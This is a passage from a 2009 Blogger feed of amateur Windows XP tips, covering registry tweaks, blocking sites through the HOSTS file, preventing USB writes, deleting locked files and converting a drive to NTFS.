/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1837357687638347379/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/airtel-song-in-c-language.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1837357687638347379'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1837357687638347379'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/airtel-song-in-c-language.html' title='Airtel song in C language.'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-3606266112910018742</id><published>2009-11-26T03:50:00.001-08:00</published><updated>2009-11-26T03:50:41.672-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>How to Delete Specific URLs from your Browser (Firefox &amp; IE)</title><content type='html'>Sometimes a situation comes that we have to delete certain specific website address (url) only from the web-browser location or address bar say to preserve your identity. For example, you visited a certain website and don’t want your friends or others to know that you visited that site, then you have two methods to delete the website links either delete all the urls from the address bar or only the specific one (recommended).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;## In Firefox, you just need to move your mouse over the website entry and press Shift + Delete Key combination to delete the desired address from the history.&lt;br /&gt;&lt;br /&gt;## For Internet Explorer, follow the steps exactly as described bellow; do keep in mind this trick needs editing the registry and you need to be very careful with it:&lt;br /&gt;&lt;br /&gt;• Close any open Internet Explorer window&lt;br /&gt;&lt;br /&gt;• Go to Start-&gt;Run and type in regedit.exe and press enter to launch the registry editor&lt;br /&gt;&lt;br /&gt;• Navigate to the following key:&lt;br /&gt;HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs&lt;br /&gt;&lt;br /&gt;• Delete the desired URL&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-3606266112910018742?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/3606266112910018742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-delete-specific-urls-from-your.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3606266112910018742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/3606266112910018742'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-delete-specific-urls-from-your.html' title='How to Delete Specific URLs from your Browser (Firefox &amp; IE)'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5300863040073281082</id><published>2009-11-26T03:49:00.001-08:00</published><updated>2009-11-26T03:49:51.121-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Notepad'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title type='text'>how to block unwanted sites using notepad</title><content type='html'>There are hundreds if not thousands of software programs that are available to block unwanted sites on your PC. some straightforward commands and a text editing program like notepad ( on every windows PC since windows3.1) and you not simply stop someone one(kids, husbands, brother in-laws) from visiting sites that might put computer at risk, or expose them to thing you don’t want them to know about.&lt;br /&gt;&lt;br /&gt;1. Know the list of sites you want to block make sure your computer has an internet connection.&lt;br /&gt;&lt;br /&gt;2. Standard look of DOS Window Open a command window (DOS), and type in nslookup&lt;br /&gt;&lt;br /&gt;3. Jot down this IP address for future reference type in the name of the site you want to send them to when they visit one of the sites you don’t want them to go to. Ie. Quote:&lt;br /&gt;www.google.com  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;etc…&lt;br /&gt;&lt;br /&gt;4. Found on XP Find the “HOSTS” file on your PC. HINT: on Windows(Pre XP ) it will be located under C:\WINNT\System32\Drivers\etc On WindowXP machines it will be located under C:\WINDOWS\System32\Drivers\etc&lt;br /&gt;&lt;br /&gt;5. Double Click on the file named “HOSTS”, there is no extension for this file.&lt;br /&gt;&lt;br /&gt;6. Select NOTEPAD to open and edit this file with Your PC should ask what program you want to open this file with. Select “Browse” and the select Notepad as the program you want to use.&lt;br /&gt;7. Basic HOST file setup there is some basic instructions on how to enter things in here. 127.0.0.1 is the universal IP address for the “loop back address” on every windows PC in the world. By using this entry, any request to a certain address will send the request back to your PC.&lt;br /&gt;&lt;br /&gt;8. Don’t just block them, send them somewhere useful Start by entering the IP address you jotted down earlier. Followed by the name of the site you want to block&lt;br /&gt;&lt;br /&gt;9. One drawback to this is that you will need to enter the domain name twice Once as the domain name, and once with WWW in it.&lt;br /&gt;&lt;br /&gt;10. Save the file.&lt;br /&gt;&lt;br /&gt;11. Open browser and try to visit the site, you should be redirected back to where you wanted them to go. if you use 127.0.0.1 and are not running a web server on your computer then your browser should return the standard ( 404 page not found error )&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5300863040073281082?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5300863040073281082/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-block-unwanted-sites-using.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5300863040073281082'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5300863040073281082'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-block-unwanted-sites-using.html' title='how to block unwanted sites using notepad'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6269571188342132263</id><published>2009-11-26T03:48:00.003-08:00</published><updated>2009-11-26T03:48:57.785-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><title type='text'>Graphing calculator for Windows XP</title><content type='html'>The calculator which ships with Windows is very useful for performing basic arithmetic and low-level scientific functions, however if you are looking for a more powerful calculator, check out Microsoft’s Power Calculator.&lt;br /&gt;download it from that link.. &lt;br /&gt;Quote:&lt;br /&gt;http://download.microsoft.com/downlo...ertoySetup.exe  &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This calculator replacement offers advanced functionality such as graphing, variable storage and full equation writing. If you ever used a TI-8x calculator, the functions of the Power Calculator are similar (although not nearly as fully featured) with respect to the mathematical operations.&lt;br /&gt;&lt;br /&gt;This tool is a free download, so if you think it will be useful to you give it a try.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6269571188342132263?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6269571188342132263/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/graphing-calculator-for-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6269571188342132263'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6269571188342132263'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/graphing-calculator-for-windows-xp.html' title='Graphing calculator for Windows XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-5775579452526464907</id><published>2009-11-26T03:47:00.005-08:00</published><updated>2009-11-26T03:47:58.605-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><title type='text'>ACCESS INTERNET THROUGH UR MS CALCULATOR</title><content type='html'>1. Open your MS Calculator. This is normally found in Start =&gt; All Programs =&gt; Accessories =&gt; Calculator.&lt;br /&gt;&lt;br /&gt;2. Open the help-window by pressing the F1 key.&lt;br /&gt;&lt;br /&gt;3. Click the top-left corner icon of the help window once (Standard is a Document with a Questionmark).&lt;br /&gt;&lt;br /&gt;4. Select Go to URL-address.&lt;br /&gt;&lt;br /&gt;5. Type your address into the avaliable field, but remember to type http:// and not just www. (or equivalent).&lt;br /&gt;&lt;br /&gt;6. Have fun&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-5775579452526464907?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/5775579452526464907/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/access-internet-through-ur-ms.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5775579452526464907'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/5775579452526464907'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/access-internet-through-ur-ms.html' title='ACCESS INTERNET THROUGH UR MS CALCULATOR'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8869393730199729392</id><published>2009-11-26T03:47:00.001-08:00</published><updated>2009-11-26T03:47:26.454-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='hide'/><category scheme='http://www.blogger.com/atom/ns#' term='pendrive'/><title type='text'>How to prevent users from writing to USB drives</title><content type='html'>Today USB drive also known as keychain drive is becoming the most popular removable storage device to move data to different locations. USB drives are available in the market with different features, for example password protected, compatible with all windows versions and extra storage capacity (up to 65 GB).&lt;br /&gt;&lt;br /&gt;A common security issue at organizations is how to prevent their workers to write data onto USB drives using their PCs, because a user can easily move confidential data for other location.&lt;br /&gt;&lt;br /&gt;If you have windows XP with SP2, then you can disable the writing option to USB drives.&lt;br /&gt;&lt;br /&gt;Follow the given steps to disable the USB writing option:&lt;br /&gt;&lt;br /&gt;To edit the computer registry, first you should log onto your computer with administrative rights.&lt;br /&gt;&lt;br /&gt;First click on Start button and type "Regedit" in Run option.&lt;br /&gt;&lt;br /&gt;Here locate the location to:&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l&lt;br /&gt;&lt;br /&gt;Here in right side panel, click right to create a key with the name "StorageDevicePolicies".&lt;br /&gt;&lt;br /&gt;Now in left side panel, select "StorageDevicePolicies" key, again right click to create new DWORD value then label it "WriteProtect".&lt;br /&gt;&lt;br /&gt;Set its value to "1". But again enable this option set its values "0".&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Now close the registry editor and restart your computer after any changes to go into effect&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8869393730199729392?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8869393730199729392/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-prevent-users-from-writing-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8869393730199729392'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8869393730199729392'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-prevent-users-from-writing-to.html' title='How to prevent users from writing to USB drives'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1232185459706573971</id><published>2009-11-26T03:46:00.003-08:00</published><updated>2009-11-26T03:46:50.019-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>Control Panel On ur Desktop</title><content type='html'>On The Desktop, Right Click Your Mouse Then Choose "New | Folder". Name The Folder As &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;ControlPanel.{21EC2020-3AEA-1069-A2DD-08002B30309D}  &lt;br /&gt;&lt;br /&gt;And Now You Can Access The Control Panel More Faster Then Before.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1232185459706573971?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1232185459706573971/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/control-panel-on-ur-desktop.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1232185459706573971'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1232185459706573971'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/control-panel-on-ur-desktop.html' title='Control Panel On ur Desktop'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-8339937415683351913</id><published>2009-11-26T03:46:00.001-08:00</published><updated>2009-11-26T03:46:05.216-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Delete An "undeletable" File</title><content type='html'>Open a Command Prompt window and leave it open.&lt;br /&gt;Close all open programs.&lt;br /&gt;Click Start, Run and enter TASKMGR.EXE&lt;br /&gt;Go to the Processes tab and End Process on Explorer.exe.&lt;br /&gt;Leave Task Manager open.&lt;br /&gt;Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.&lt;br /&gt;At the command prompt type DEL &lt;filename&gt; where &lt;filename&gt; is the file you wish to delete.&lt;br /&gt;Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.&lt;br /&gt;Close Task Manager.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Or you can try this&lt;br /&gt;&lt;br /&gt;Open Notepad.exe&lt;br /&gt;&lt;br /&gt;Click File&gt;Save As..&gt;&lt;br /&gt;&lt;br /&gt;locate the folder where ur undeletable file is&lt;br /&gt;&lt;br /&gt;Choose 'All files' from the file type box&lt;br /&gt;&lt;br /&gt;click once on the file u wanna delete so its name appears in the 'filename' box&lt;br /&gt;&lt;br /&gt;put a " at the start and end of the filename&lt;br /&gt;(the filename should have the extension of the undeletable file so it will overwrite it)&lt;br /&gt;&lt;br /&gt;click save,&lt;br /&gt;&lt;br /&gt;It should ask u to overwrite the existing file, choose yes and u can delete it as normal&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-8339937415683351913?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/8339937415683351913/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/delete-undeletable-file.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8339937415683351913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/8339937415683351913'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/delete-undeletable-file.html' title='Delete An &quot;undeletable&quot; File'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-6837994860838282782</id><published>2009-11-26T03:45:00.001-08:00</published><updated>2009-11-26T03:45:19.040-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Graphics'/><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><title type='text'>XP Animations</title><content type='html'>You can turn off window animation ("exploding" windows), displayed when you play around with minimizing/maximizing open windows. This makes navigating Windows 95/98/ME/NT4/2000/XP a lot quicker, especially if you don't have a fast video controller, or if you got tired of seeing it all the time (like I did).&lt;br /&gt;&lt;br /&gt;To do this, run Regedit (or Regedt32) and go to:&lt;br /&gt;HKEY_CURRENT_USER | Control Panel | Desktop | WindowMetrics &lt;br /&gt;or if you are the only user of your Windows computer go to:&lt;br /&gt;HKEY_USERS | .Default | Control Panel | Desktop | WindowMetrics&lt;br /&gt;&lt;br /&gt;Right-click on an empty spot in the right hand pane. Select New -&gt; String [REG_SZ] Value. Name it MinAnimate. Click OK. Double-click on "MinAnimate" and type 0 to turn OFF window animation or 1 to turn it ON. Click OK. Close the Registry Editor and restart Windows. Done.&lt;br /&gt;&lt;br /&gt;TweakUI, the famous Microsoft Power Toy [110 KB, free, unsupported] can also turn off animated windows.&lt;br /&gt;Just remove the check mark from the "Window Animation" box under the General tab&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-6837994860838282782?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/6837994860838282782/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/xp-animations.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6837994860838282782'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/6837994860838282782'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/xp-animations.html' title='XP Animations'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-1172131695838906809</id><published>2009-11-26T03:42:00.000-08:00</published><updated>2009-11-26T03:42:00.967-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>How to copy files when you get the prompt "files is too large for the destination files system"</title><content type='html'>Run an Administrator Console (click the Start Menu, type cmd, then right click on the command prompt and click "Run As Administrator") then run:&lt;br /&gt;&lt;br /&gt;C:\Users\J&gt;convert g: /fs:ntfs /nosecurity&lt;br /&gt;&lt;br /&gt;where g: is the drive of your external hard disk&lt;br /&gt;&lt;br /&gt;The type of the file system is FAT32.Enter current volume label for drive H: My Book&lt;br /&gt;The volume is in use by another process. Chkdskmight report errors when no corruption is present.&lt;br /&gt;Volume My Book created 1/31/2009 2:23 PM&lt;br /&gt;Volume Serial Number is XXXX-XXXXWindows is verifying files and folders...&lt;br /&gt;File and folder verification is complete.&lt;br /&gt;Windows has checked the file system and found no problems.&lt;br /&gt;244,136,352 KB total disk space.&lt;br /&gt;128 KB in 4 hidden files.544 KB in 17 folders.&lt;br /&gt;3,063,072 KB in 63 files.&lt;br /&gt;241,072,576 KB are available. &lt;br /&gt;32,768 bytes in each allocation unit.&lt;br /&gt;7,629,261 total allocation units on disk.&lt;br /&gt;7,533,518 allocation units available on disk. &lt;br /&gt;Determining disk space required for file system conversion...&lt;br /&gt;Total disk space: 244196001 KBFree space on volume: &lt;br /&gt;241072576 KBSpace required for conversion: &lt;br /&gt;369647 KBConverting file systemConversion complete&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-1172131695838906809?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/1172131695838906809/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-copy-files-when-you-get-prompt.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1172131695838906809'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/1172131695838906809'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-copy-files-when-you-get-prompt.html' title='How to copy files when you get the prompt &quot;files is too large for the destination files system&quot;'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-2552320627135312822</id><published>2009-11-26T03:41:00.002-08:00</published><updated>2009-11-26T03:41:37.298-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='registry entry'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Run'/><title type='text'>Create Registry Files Yourself</title><content type='html'>getting allergic to edit youe registry in regedit&lt;br /&gt;use these steps and make .reg files&lt;br /&gt;double click&lt;br /&gt;and&lt;br /&gt;here you ve done it&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To backup the registry&lt;br /&gt;&lt;br /&gt;Click Start, then click Run. The Run dialog box appears. &lt;br /&gt;In the Open box, type regedit, then press ENTER. The Registry Editor appears. &lt;br /&gt;Do one of the following: &lt;br /&gt;To backup the entire registry, click My Computer. &lt;br /&gt;To backup a specific group of keys or a specific key, click the folder or key.&lt;br /&gt;On the main menu, click File, then click Export. The Export Registry File dialog box appears. &lt;br /&gt;Specify a name and location for the file, then click Save. The export process begins. &lt;br /&gt;If you are exporting the entire registry, it can take a few minutes, and the file size can be up to 100 MB or more. If you are exporting just one key, the file size is approximately 1 KB.&lt;br /&gt;&lt;br /&gt;After you edit the registry, if you are experiencing problems caused by editing the registry, you can import the backed up file: &lt;br /&gt;On the main menu, click File, then click Import. The Import Registry File dialog box appears. &lt;br /&gt;&lt;br /&gt;Click the .reg file to import, then click Open. The import process begins. If you are importing the entire registry, it can take a few minutes.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To create a .reg file&lt;br /&gt;&lt;br /&gt;In a text editor, such as Notepad, type or paste the following text on the first line: &lt;br /&gt;Windows Registry Editor Version 5.00&lt;br /&gt;&lt;br /&gt;On the second line, type or paste the key path. For example, type: &lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\SOFTWARE\GlobalSCAPE Inc.\EFT Server 4.0\EventRules]&lt;br /&gt;&lt;br /&gt;(include brackets)&lt;br /&gt;&lt;br /&gt;On the third line, type or paste the name of the key and the value (DWORD) for the key. For example, type: &lt;br /&gt;"FolderMonitorWorkerThreadCount"=dword:0000010 0&lt;br /&gt;&lt;br /&gt;(include quotation marks)&lt;br /&gt;&lt;br /&gt;Close the file and save it with a .reg extension. For example, type: &lt;br /&gt;threadcount.reg&lt;br /&gt;&lt;br /&gt;Double-click the file and follow the prompts to install the key into the registry. If you receive an error, open the file to verify the information was typed correctly. The .reg file can be transported to and used on other computers&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-2552320627135312822?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/2552320627135312822/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-registry-files-yourself.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2552320627135312822'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/2552320627135312822'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/create-registry-files-yourself.html' title='Create Registry Files Yourself'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-175950149315433597</id><published>2009-11-26T03:41:00.000-08:00</published><updated>2009-11-26T03:41:11.496-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='XP'/><category scheme='http://www.blogger.com/atom/ns#' term='speedup'/><title type='text'>how to Speed Up Menus in windows XP</title><content type='html'>1. Click Start, and then click Run.&lt;br /&gt;&lt;br /&gt;2. Type Regedit in the box, and then click OK.&lt;br /&gt;&lt;br /&gt;3. Expand the menu in the left panel and select the HKEY_CURRENT_USER\Control Panel\Desktop folder.&lt;br /&gt;&lt;br /&gt;4. Scroll down in the right panel and double click on the MenuShowDelay file.&lt;br /&gt;&lt;br /&gt;5. In the Value Data box, change to default value for the menu speed from 400 to a lesser number, such as 1.&lt;br /&gt;&lt;br /&gt;6. Click OK.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-175950149315433597?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://xynotes.blogspot.com/feeds/175950149315433597/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-speed-up-menus-in-windows-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/175950149315433597'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7387936170644921109/posts/default/175950149315433597'/><link rel='alternate' type='text/html' href='http://xynotes.blogspot.com/2009/11/how-to-speed-up-menus-in-windows-xp.html' title='how to Speed Up Menus in windows XP'/><author><name>R.D</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/_MuKCFAFXrZs/SjCB61KrgEI/AAAAAAAAAAM/imyKXILjptM/S220/ME.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7387936170644921109.post-4174833829240142619</id><published>2009-11-26T03:40:00.003-08:00</published><updated>2009-11-26T03:40:35.661-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Fun'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><title type='text'>Create Your Own Drive</title><content type='html'>IF U WANT TO CREATE UR OWN PERSONAL DRIVE!&lt;br /&gt;then...&lt;br /&gt;&lt;br /&gt;Do this &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Go to c drive &lt;br /&gt;&lt;br /&gt;Create a new folder ( say samp1 ) &lt;br /&gt;&lt;br /&gt;now go to command prompt and type &lt;br /&gt;&lt;br /&gt;subst z: c:\samp1 &lt;br /&gt;&lt;br /&gt;now go to my computer and check it&lt;br /&gt;&lt;br /&gt;to remove the drive &lt;br /&gt;&lt;br /&gt;go to command prompt and type &lt;br /&gt;&lt;br /&gt;subst z: /d &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;it might be old.. but&lt;br /&gt;Not every One knows it&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7387936170644921109-4174833829240142619?l=xynotes.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link 